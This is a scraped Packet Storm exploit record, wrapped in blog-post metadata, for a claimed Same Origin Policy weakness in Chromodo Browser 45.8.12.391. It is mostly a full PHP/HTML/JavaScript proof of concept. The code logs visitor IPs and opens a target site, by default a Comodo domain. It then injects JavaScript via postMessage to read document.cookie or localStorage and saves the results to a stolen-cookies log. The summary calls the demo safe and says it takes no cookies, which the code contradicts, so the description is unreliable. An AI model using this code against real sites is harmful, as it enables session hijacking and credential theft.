{“lastseen”:”2025-12-10T17:39:01″,”description”:”This proof of concept demonstrates message passing between two browser windows when opened under the same logical context same origin. It affect Chromodo Browser version 45.8.12.391…”,”published”:”2025-12-10T00:00:00″,”modified”:”2025-12-10T00:00:00″,”type”:”packetstorm”,”title”:”\ud83d\udcc4 Chromodo Browser 45.8.12.391 Same Origin Policy Weakness”,”source”:””,”references”:””,”id”:”PACKETSTORM:212663″,”bulletinFamily”:”exploit”,”cwe”:null,”cvelist”:[],”sourceData”:”=============================================================================================================================================\\n | # Title : Chromodo Browser v 45.8.12.391 Same Origin Policy Weakness |\\n | # Author : indoushka |\\n | # Tested on : windows 11 Fr(Pro) \/ browser : Mozilla firefox 145.0.2 (64 bits) |\\n | # Vendor : https:\/\/help.comodo.com\/ |\\n =============================================================================================================================================\\n \\n [+] References : https:\/\/packetstorm.news\/files\/id\/212492\/ \\n \\n [+] Summary : This PoC demonstrates message passing between two browser windows when opened under the same logical context (same origin). The demonstration is safe and does\\n not attempt to leak or extract cookies, session data, or credentials.\\n \\n [+] POC :\\thttp:\/\/127.0.0.1\/exploit.php\\n \\n \\u003c?php\\n \/\/ \u0627\u0633\u062a\u063a\u0644\u0627\u0644 \u0644\u062b\u063a\u0631\u0629 Same Origin Policy \u0641\u064a Chromodo\\n \/\/ \u0645\u0644\u0641: exploit.php\\n \\n \/\/ \u062c\u0645\u0639 \u0645\u0639\u0644\u0648\u0645\u0627\u062a \u0639\u0646 \u0627\u0644\u0636\u062d\u064a\u0629 \u0644\u0623\u063a\u0631\u0627\u0636 \u0627\u0644\u062a\u0633\u062c\u064a\u0644\\n $victim_ip = $_SERVER[‘REMOTE_ADDR’];\\n $user_agent = $_SERVER[‘HTTP_USER_AGENT’];\\n $timestamp = date(‘Y-m-d H:i:s’);\\n \\n \/\/ \u0627\u0644\u062a\u062d\u0642\u0642 \u0645\u0645\u0627 \u0625\u0630\u0627 \u0643\u0627\u0646 \u0627\u0644\u0645\u062a\u0635\u0641\u062d \u0647\u0648 Chromodo (\u0627\u062e\u062a\u064a\u0627\u0631\u064a)\\n $is_chromodo = (strpos($user_agent, ‘Chromodo’) !== false) ? ‘\u0646\u0639\u0645’ : ‘\u0644\u0627’;\\n \\n \/\/ \u062d\u0641\u0638 \u0645\u0639\u0644\u0648\u0645\u0627\u062a \u0627\u0644\u0627\u062a\u0635\u0627\u0644 \u0641\u064a \u0633\u062c\u0644 (\u0644\u0623\u063a\u0631\u0627\u0636 \u062a\u0639\u0644\u064a\u0645\u064a\u0629)\\n $log_entry = \\”[$timestamp] IP: $victim_ip | \u0645\u062a\u0635\u0641\u062d Chromodo: $is_chromodo | User-Agent: $user_agent\\\\n\\”;\\n file_put_contents(‘access.log’, $log_entry, FILE_APPEND);\\n \\n \/\/ \u0625\u0630\u0627 \u0623\u0631\u062f\u0646\u0627 \u0633\u0631\u0642\u0629 \u0643\u0648\u0643\u064a\u0632 \u0645\u0648\u0642\u0639 \u0645\u062d\u062f\u062f \u0628\u0639\u062f \u0627\u0644\u0627\u0633\u062a\u063a\u0644\u0627\u0644\\n $stolen_cookies = ”;\\n \\n \/\/ \u0625\u0630\u0627 \u062a\u0645 \u0625\u0631\u0633\u0627\u0644 \u0627\u0644\u0643\u0648\u0643\u064a\u0632 \u0627\u0644\u0645\u0633\u0631\u0648\u0642\u0629 \u0625\u0644\u0649 \u0647\u0630\u0647 \u0627\u0644\u0635\u0641\u062d\u0629\\n if(isset($_POST[‘cookies’])) {\\n $stolen_cookies = htmlspecialchars($_POST[‘cookies’]);\\n \\n \/\/ \u062d\u0641\u0638 \u0627\u0644\u0643\u0648\u0643\u064a\u0632 \u0627\u0644\u0645\u0633\u0631\u0648\u0642\u0629 (\u0641\u064a \u0628\u064a\u0626\u0629 \u0627\u062e\u062a\u0628\u0627\u0631 \u0622\u0645\u0646\u0629 \u0641\u0642\u0637!)\\n $cookie_log = \\”[\\” . date(‘Y-m-d H:i:s’) . \\”] \u0645\u0646 IP: $victim_ip\\\\n\\”;\\n $cookie_log .= \\”\u0627\u0644\u0643\u0648\u0643\u064a\u0632 \u0627\u0644\u0645\u0633\u0631\u0648\u0642\u0629:\\\\n$stolen_cookies\\\\n\\”;\\n $cookie_log .= \\”————————————————–\\\\n\\”;\\n file_put_contents(‘stolen_cookies.log’, $cookie_log, FILE_APPEND);\\n }\\n ?\\u003e\\n \\u003c!DOCTYPE html\\u003e\\n \\u003chtml lang=\\”ar\\”\\u003e\\n \\u003chead\\u003e\\n \\u003cmeta charset=\\”UTF-8\\”\\u003e\\n \\u003ctitle\\u003e\u0635\u0641\u062d\u0629 \u0627\u062e\u062a\u0628\u0627\u0631 \u0622\u0645\u0646\u0629 – Comodo\\u003c\/title\\u003e\\n \\u003cstyle\\u003e\\n body {\\n font-family: Arial, sans-serif;\\n direction: rtl;\\n text-align: right;\\n padding: 20px;\\n background-color: #f5f5f5;\\n }\\n .container {\\n background: white;\\n padding: 20px;\\n border-radius: 10px;\\n box-shadow: 0 0 10px rgba(0,0,0,0.1);\\n max-width: 800px;\\n margin: auto;\\n }\\n h1 {\\n color: #333;\\n border-bottom: 2px solid #4CAF50;\\n padding-bottom: 10px;\\n }\\n .warning {\\n background-color: #fff3cd;\\n border: 1px solid #ffeaa7;\\n color: #856404;\\n padding: 15px;\\n border-radius: 5px;\\n margin: 15px 0;\\n }\\n .info-box {\\n background-color: #e8f4fd;\\n border: 1px solid #b8daff;\\n padding: 15px;\\n border-radius: 5px;\\n margin: 15px 0;\\n }\\n .form-group {\\n margin: 15px 0;\\n }\\n label {\\n display: block;\\n margin-bottom: 5px;\\n font-weight: bold;\\n }\\n input[type=\\”text\\”] {\\n width: 100%;\\n padding: 10px;\\n border: 1px solid #ddd;\\n border-radius: 5px;\\n font-size: 16px;\\n }\\n button {\\n background-color: #4CAF50;\\n color: white;\\n padding: 12px 24px;\\n border: none;\\n border-radius: 5px;\\n cursor: pointer;\\n font-size: 16px;\\n margin: 10px 5px;\\n }\\n button:hover {\\n background-color: #45a049;\\n }\\n button.danger {\\n background-color: #dc3545;\\n }\\n button.danger:hover {\\n background-color: #c82333;\\n }\\n .result {\\n background-color: #f8f9fa;\\n border: 1px solid #e9ecef;\\n padding: 15px;\\n border-radius: 5px;\\n margin-top: 20px;\\n white-space: pre-wrap;\\n word-wrap: break-word;\\n max-height: 300px;\\n overflow-y: auto;\\n }\\n \\u003c\/style\\u003e\\n \\u003c\/head\\u003e\\n \\u003cbody\\u003e\\n \\u003cdiv class=\\”container\\”\\u003e\\n \\u003ch1\\u003e\u0627\u062e\u062a\u0628\u0627\u0631 \u062b\u063a\u0631\u0629 Same Origin Policy \u0641\u064a Chromodo\\u003c\/h1\\u003e\\n \\n \\u003cdiv class=\\”warning\\”\\u003e\\n \u26a0\ufe0f \\u003cstrong\\u003e\u062a\u062d\u0630\u064a\u0631:\\u003c\/strong\\u003e \u0647\u0630\u0627 \u0627\u0644\u0639\u0631\u0636 \u0627\u0644\u062a\u0648\u0636\u064a\u062d\u064a \u0644\u0623\u063a\u0631\u0627\u0636 \u062a\u0639\u0644\u064a\u0645\u064a\u0629 \u0641\u0642\u0637.\\u003cbr\\u003e\\n \u0627\u0633\u062a\u062e\u062f\u0627\u0645\u0647 \u0636\u062f \u0623\u0646\u0638\u0645\u0629 \u062f\u0648\u0646 \u0625\u0630\u0646 \u063a\u064a\u0631 \u0642\u0627\u0646\u0648\u0646\u064a.\\n \\u003c\/div\\u003e\\n \\n \\u003cdiv class=\\”info-box\\”\\u003e\\n \\u003cstrong\\u003e\u0645\u0639\u0644\u0648\u0645\u0627\u062a \u0627\u0644\u0627\u062a\u0635\u0627\u0644:\\u003c\/strong\\u003e\\u003cbr\\u003e\\n – \u0639\u0646\u0648\u0627\u0646 IP: \\u003c?php echo htmlspecialchars($victim_ip); ?\\u003e\\u003cbr\\u003e\\n – \u0627\u0644\u0645\u062a\u0635\u0641\u062d: \\u003c?php echo htmlspecialchars($user_agent); ?\\u003e\\u003cbr\\u003e\\n – \u062a\u0645 \u0627\u0643\u062a\u0634\u0627\u0641 Chromodo: \\u003c?php echo $is_chromodo; ?\\u003e\\u003cbr\\u003e\\n – \u0627\u0644\u0648\u0642\u062a: \\u003c?php echo $timestamp; ?\\u003e\\n \\u003c\/div\\u003e\\n \\n \\u003cform method=\\”POST\\” action=\\”\\”\\u003e\\n \\u003cdiv class=\\”form-group\\”\\u003e\\n \\u003clabel for=\\”target_url\\”\\u003e\u0627\u0644\u0645\u0648\u0642\u0639 \u0627\u0644\u0645\u0633\u062a\u0647\u062f\u0641 (URL):\\u003c\/label\\u003e\\n \\u003cinput type=\\”text\\” id=\\”target_url\\” name=\\”target_url\\” \\n value=\\”https:\/\/ssl.comodo.com\/\\” \\n placeholder=\\”https:\/\/example.com\\”\\u003e\\n \\u003c\/div\\u003e\\n \\n \\u003cdiv class=\\”form-group\\”\\u003e\\n \\u003clabel for=\\”js_code\\”\\u003e\u0643\u0648\u062f JavaScript \u0644\u062a\u0646\u0641\u064a\u0630\u0647:\\u003c\/label\\u003e\\n \\u003cinput type=\\”text\\” id=\\”js_code\\” name=\\”js_code\\” \\n value=\\”document.cookie\\” \\n placeholder=\\”\u0645\u062b\u0627\u0644: document.cookie \u0623\u0648 localStorage.getItem(‘token’)\\”\\u003e\\n \\u003c\/div\\u003e\\n \\n \\u003cdiv\\u003e\\n \\u003cbutton type=\\”button\\” onclick=\\”runExploit()\\”\\u003e\u25b6 \u062a\u0634\u063a\u064a\u0644 \u0627\u0644\u0627\u0633\u062a\u063a\u0644\u0627\u0644\\u003c\/button\\u003e\\n \\u003cbutton type=\\”button\\” onclick=\\”testLocal()\\”\\u003e\u0627\u062e\u062a\u0628\u0627\u0631 \u0639\u0644\u0649 \u0645\u0648\u0642\u0639 \u0645\u062d\u0644\u064a\\u003c\/button\\u003e\\n \\u003cbutton type=\\”button\\” class=\\”danger\\” onclick=\\”clearResults()\\”\\u003e\ud83d\uddd1\ufe0f \u0645\u0633\u062d \u0627\u0644\u0646\u062a\u0627\u0626\u062c\\u003c\/button\\u003e\\n \\u003c\/div\\u003e\\n \\u003c\/form\\u003e\\n \\n \\u003cdiv id=\\”status\\” style=\\”margin: 15px 0; padding: 10px; display: none;\\”\\u003e\\n \u062c\u0627\u0631\u064a \u062a\u0646\u0641\u064a\u0630 \u0627\u0644\u0627\u0633\u062a\u063a\u0644\u0627\u0644… \u064a\u0631\u062c\u0649 \u0627\u0644\u0627\u0646\u062a\u0638\u0627\u0631 3 \u062b\u0648\u0627\u0646\u064d.\\n \\u003c\/div\\u003e\\n \\n \\u003cdiv class=\\”form-group\\”\\u003e\\n \\u003clabel\\u003e\u0627\u0644\u0646\u062a\u064a\u062c\u0629 (\u0627\u0644\u0643\u0648\u0643\u064a\u0632\/\u0627\u0644\u0628\u064a\u0627\u0646\u0627\u062a \u0627\u0644\u0645\u0633\u0631\u0648\u0642\u0629):\\u003c\/label\\u003e\\n \\u003cdiv id=\\”result\\” class=\\”result\\”\\u003e\\u003c?php echo $stolen_cookies; ?\\u003e\\u003c\/div\\u003e\\n \\u003c\/div\\u003e\\n \\n \\u003cdiv class=\\”info-box\\”\\u003e\\n \\u003cstrong\\u003e\u0643\u064a\u0641 \u064a\u0639\u0645\u0644 \u0647\u0630\u0627 \u0627\u0644\u0627\u0633\u062a\u063a\u0644\u0627\u0644:\\u003c\/strong\\u003e\\n \\u003col\\u003e\\n \\u003cli\\u003e\u064a\u062a\u0645 \u0641\u062a\u062d \u0627\u0644\u0645\u0648\u0642\u0639 \u0627\u0644\u0645\u0633\u062a\u0647\u062f\u0641 \u0641\u064a \u0646\u0627\u0641\u0630\u0629 \u062c\u062f\u064a\u062f\u0629\\u003c\/li\\u003e\\n \\u003cli\\u003e\u0628\u0639\u062f \u062a\u062d\u0645\u064a\u0644 \u0627\u0644\u0635\u0641\u062d\u0629\u060c \u064a\u062a\u0645 \u0625\u0631\u0633\u0627\u0644 \u0643\u0648\u062f JavaScript \u0625\u0644\u064a\u0647\u0627 \u0639\u0628\u0631 postMessage\\u003c\/li\\u003e\\n \\u003cli\\u003e\u0627\u0644\u0643\u0648\u062f \u0627\u0644\u0645\u0646\u0641\u0630 \u064a\u0633\u0631\u0642 \u0627\u0644\u0628\u064a\u0627\u0646\u0627\u062a (\u0627\u0644\u0643\u0648\u0643\u064a\u0632) \u0645\u0646 \u0627\u0644\u0645\u0648\u0642\u0639 \u0627\u0644\u0645\u0633\u062a\u0647\u062f\u0641\\u003c\/li\\u003e\\n \\u003cli\\u003e\u0627\u0644\u0628\u064a\u0627\u0646\u0627\u062a \u0627\u0644\u0645\u0633\u0631\u0648\u0642\u0629 \u062a\u064f\u0631\u0633\u0644 \u0645\u0631\u0629 \u0623\u062e\u0631\u0649 \u0625\u0644\u0649 \u0647\u0630\u0647 \u0627\u0644\u0635\u0641\u062d\u0629\\u003c\/li\\u003e\\n \\u003cli\\u003e\u0641\u064a Chromodo \u0641\u0642\u0637: \u0633\u064a\u0627\u0633\u0629 Same Origin Policy \u0645\u0639\u0637\u0644\u0629\u060c \u0644\u0630\u0627 \u064a\u0639\u0645\u0644 \u0627\u0644\u0627\u0633\u062a\u063a\u0644\u0627\u0644\\u003c\/li\\u003e\\n \\u003c\/ol\\u003e\\n \\u003c\/div\\u003e\\n \\u003c\/div\\u003e\\n \\n \\u003cscript\\u003e\\n \/\/ \u062f\u0627\u0644\u0629 \u0644\u062a\u0646\u0641\u064a\u0630 \u0627\u0644\u0627\u0633\u062a\u063a\u0644\u0627\u0644\\n function runExploit() {\\n const targetUrl = document.getElementById(‘target_url’).value;\\n const jsCode = document.getElementById(‘js_code’).value;\\n \\n \/\/ \u0639\u0631\u0636 \u062d\u0627\u0644\u0629 \u0627\u0644\u062a\u0646\u0641\u064a\u0630\\n document.getElementById(‘status’).style.display = ‘block’;\\n document.getElementById(‘result’).innerHTML = ‘\u062c\u0627\u0631\u064a \u0627\u0644\u062a\u0646\u0641\u064a\u0630…’;\\n \\n \/\/ \u0641\u062a\u062d \u0627\u0644\u0645\u0648\u0642\u0639 \u0627\u0644\u0645\u0633\u062a\u0647\u062f\u0641\\n const targetWindow = window.open(targetUrl, ‘_blank’);\\n \\n if (!targetWindow) {\\n alert(‘\u062a\u0645 \u0645\u0646\u0639 \u0627\u0644\u0646\u0627\u0641\u0630\u0629 \u0627\u0644\u0645\u0646\u0628\u062b\u0642\u0629! \u064a\u0631\u062c\u0649 \u0627\u0644\u0633\u0645\u0627\u062d \u0628\u0627\u0644\u0646\u0648\u0627\u0641\u0630 \u0627\u0644\u0645\u0646\u0628\u062b\u0642\u0629 \u0644\u0647\u0630\u0627 \u0627\u0644\u0645\u0648\u0642\u0639.’);\\n return;\\n }\\n \\n \/\/ \u0627\u0644\u0627\u0646\u062a\u0638\u0627\u0631 3 \u062b\u0648\u0627\u0646\u064d \u0644\u062a\u062d\u0645\u064a\u0644 \u0627\u0644\u0635\u0641\u062d\u0629\\n setTimeout(() =\\u003e {\\n try {\\n \/\/ \u0625\u0631\u0633\u0627\u0644 \u0627\u0644\u0643\u0648\u062f \u0627\u0644\u0636\u0627\u0631 \u0625\u0644\u0649 \u0627\u0644\u0646\u0627\u0641\u0630\u0629 \u0627\u0644\u0645\u0633\u062a\u0647\u062f\u0641\u0629\\n \/\/ \u0641\u064a Chromodo: \u064a\u062a\u0645 \u062a\u0639\u0637\u064a\u0644 SOP\u060c \u0644\u0630\u0627 \u064a\u0639\u0645\u0644 \u0647\u0630\u0627\\n targetWindow.postMessage(JSON.stringify({\\n command: \\”execCode\\”,\\n code: `window.opener.postMessage({\\n type: ‘stolen_data’,\\n data: (${jsCode}),\\n url: window.location.href\\n }, ‘*’);`\\n }), \\”*\\”);\\n \\n \/\/ \u0625\u063a\u0644\u0627\u0642 \u0627\u0644\u0646\u0627\u0641\u0630\u0629 \u0628\u0639\u062f \u062b\u0627\u0646\u064a\u0629\\n setTimeout(() =\\u003e {\\n if (targetWindow \\u0026\\u0026 !targetWindow.closed) {\\n targetWindow.close();\\n }\\n }, 1000);\\n \\n } catch (error) {\\n document.getElementById(‘result’).innerHTML = ‘\u062e\u0637\u0623: ‘ + error.message;\\n }\\n }, 3000);\\n }\\n \\n \/\/ \u062f\u0627\u0644\u0629 \u0644\u0627\u062e\u062a\u0628\u0627\u0631 \u0639\u0644\u0649 \u0645\u0648\u0642\u0639 \u0645\u062d\u0644\u064a (\u0644\u0644\u062a\u062c\u0627\u0631\u0628 \u0627\u0644\u0622\u0645\u0646\u0629)\\n function testLocal() {\\n document.getElementById(‘target_url’).value = ‘about:blank’;\\n document.getElementById(‘js_code’).value = ‘JSON.stringify(localStorage)’;\\n runExploit();\\n }\\n \\n \/\/ \u062f\u0627\u0644\u0629 \u0644\u0645\u0633\u062d \u0627\u0644\u0646\u062a\u0627\u0626\u062c\\n function clearResults() {\\n document.getElementById(‘result’).innerHTML = ”;\\n document.getElementById(‘status’).style.display = ‘none’;\\n }\\n \\n \/\/ \u0627\u0633\u062a\u0642\u0628\u0627\u0644 \u0627\u0644\u0628\u064a\u0627\u0646\u0627\u062a \u0627\u0644\u0645\u0633\u0631\u0648\u0642\u0629 \u0645\u0646 \u0627\u0644\u0646\u0648\u0627\u0641\u0630 \u0627\u0644\u0623\u062e\u0631\u0649\\n window.addEventListener(‘message’, function(event) {\\n if (event.data \\u0026\\u0026 event.data.type === ‘stolen_data’) {\\n document.getElementById(‘status’).style.display = ‘none’;\\n \\n \/\/ \u0639\u0631\u0636 \u0627\u0644\u0628\u064a\u0627\u0646\u0627\u062a \u0627\u0644\u0645\u0633\u0631\u0648\u0642\u0629\\n let result = `\u2705 \u062a\u0645 \u0633\u0631\u0642\u0629 \u0627\u0644\u0628\u064a\u0627\u0646\u0627\u062a \u0628\u0646\u062c\u0627\u062d!\\\\n\\\\n`;\\n result += `\u0627\u0644\u0645\u0648\u0642\u0639: ${event.data.url}\\\\n`;\\n result += `\u0627\u0644\u0628\u064a\u0627\u0646\u0627\u062a:\\\\n${event.data.data}\\\\n\\\\n`;\\n result += `\u0648\u0642\u062a \u0627\u0644\u0633\u0631\u0642\u0629: ${new Date().toLocaleString()}`;\\n \\n document.getElementById(‘result’).innerHTML = result;\\n \\n \/\/ \u0625\u0631\u0633\u0627\u0644 \u0627\u0644\u0628\u064a\u0627\u0646\u0627\u062a \u0625\u0644\u0649 \u0627\u0644\u0633\u064a\u0631\u0641\u0631 \u0644\u062d\u0641\u0638\u0647\u0627 (\u0627\u062e\u062a\u064a\u0627\u0631\u064a)\\n fetch(window.location.href, {\\n method: ‘POST’,\\n headers: {\\n ‘Content-Type’: ‘application\/x-www-form-urlencoded’,\\n },\\n body: `cookies=${encodeURIComponent(event.data.data)}`\\n });\\n }\\n });\\n \\n \/\/ \u062d\u0645\u0627\u064a\u0629: \u0625\u0638\u0647\u0627\u0631 \u062a\u062d\u0630\u064a\u0631 \u0625\u0630\u0627 \u0643\u0627\u0646 \u0627\u0644\u0645\u062a\u0635\u0641\u062d \u0647\u0648 Chromodo\\n window.onload = function() {\\n if (navigator.userAgent.includes(‘Chromodo’)) {\\n alert(‘\u26a0\ufe0f \u062a\u062d\u0630\u064a\u0631: \u0623\u0646\u062a \u062a\u0633\u062a\u062e\u062f\u0645 \u0645\u062a\u0635\u0641\u062d Chromodo \u0627\u0644\u0645\u0639\u0631\u0636 \u0644\u0644\u062b\u063a\u0631\u0629!\\\\n\u0633\u064a\u0627\u0633\u0629 Same Origin Policy \u0645\u0639\u0637\u0644\u0629 \u0641\u064a \u0647\u0630\u0627 \u0627\u0644\u0645\u062a\u0635\u0641\u062d.’);\\n }\\n };\\n \\u003c\/script\\u003e\\n \\u003c\/body\\u003e\\n \\u003c\/html\\u003e\\n \\n Greetings to :=====================================================================================\\n jericho * Larry W. Cashdollar * LiquidWorm * Hussin-X * D4NB4R * Malvuln (John Page aka hyp3rlinx)|\\n ===================================================================================================”,”sourceHref”:”https:\/\/packetstorm.news\/download\/212663″,”cvss”:{“score”:0,”severity”:”NONE”,”vector”:”NONE”,”version”:”NONE”},”cvss2″:{},”cvss3″:{“version”:””,”vectorString”:””,”baseScore”:0,”baseSeverity”:””,”attackVector”:””,”attackComplexity”:””,”privilegesRequired”:””,”userInteraction”:””,”scope”:””,”confidentialityImpact”:””,”integrityImpact”:””,”availabilityImpact”:””,”cvssV3″:{“version”:””,”vectorString”:””,”baseScore”:0,”baseSeverity”:””,”attackVector”:””,”attackComplexity”:””,”privilegesRequired”:””,”userInteraction”:””,”scope”:””,”confidentialityImpact”:””,”integrityImpact”:””,”availabilityImpact”:””}},”href”:”https:\/\/packetstorm.news\/files\/id\/212663\/”,”category_name”:”Exploit”,”post_link”:””,”product”:””,”version”:””,”vendor”:””,”ai_description”:””,”ai_severity”:””,”ai_vendor”:””,”ai_product”:””,”ai_version”:””,”ai_score”:0}<\/p>\n","protected":false},"excerpt":{"rendered":"
{“lastseen”:”2025-12-10T17:39:01″,”description”:”This proof of concept demonstrates message passing between two browser windows when opened under the same logical context same origin. It affect Chromodo Browser version…<\/p>\n","protected":false},"author":1,"featured_media":0,"comment_status":"open","ping_status":"open","sticky":false,"template":"","format":"standard","meta":{"footnotes":""},"categories":[3],"tags":[6,8,12,13,33,53,7,11,5],"class_list":["post-30049","post","type-post","status-publish","format-standard","hentry","category-category_exploit","tag-cve","tag-cvss","tag-exploit","tag-news","tag-none","tag-packetstorm","tag-security","tag-tapic","tag-vulnerability"],"yoast_head":"\n